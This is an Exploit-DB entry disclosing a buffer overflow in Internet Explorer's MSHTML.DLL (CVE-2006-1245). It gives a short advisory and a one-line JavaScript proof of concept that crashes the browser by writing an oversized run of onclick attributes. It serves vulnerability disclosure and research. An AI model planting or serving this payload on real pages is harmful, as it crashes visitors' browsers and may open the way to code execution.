Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow Vulnerability

2006-03-16T00:00:00
ID EDB-ID:27433
Type exploitdb
Reporter Michal Zalewski
Modified 2006-03-16T00:00:00

Description

Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow Vulnerability. CVE-2006-1245. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/17131/info

Microsoft Internet Explorer is susceptible to a remote buffer-overflow vulnerability in 'MSHTML.DLL'. The application fails to properly bounds-check user-supplied input data before copying it into an insufficiently sized memory buffer.

Remote attackers may exploit this issue to crash affected web browsers. Remote code execution may also be possible, but this has not been confirmed.

Internet Explorer 6 is vulnerable to this issue; other versions may also be affected.

The following proof of concept is available:

<script>
for(s='<a onclick=',i=0;i<8||(document.write(s+'>'));i++)s+=s;
</script>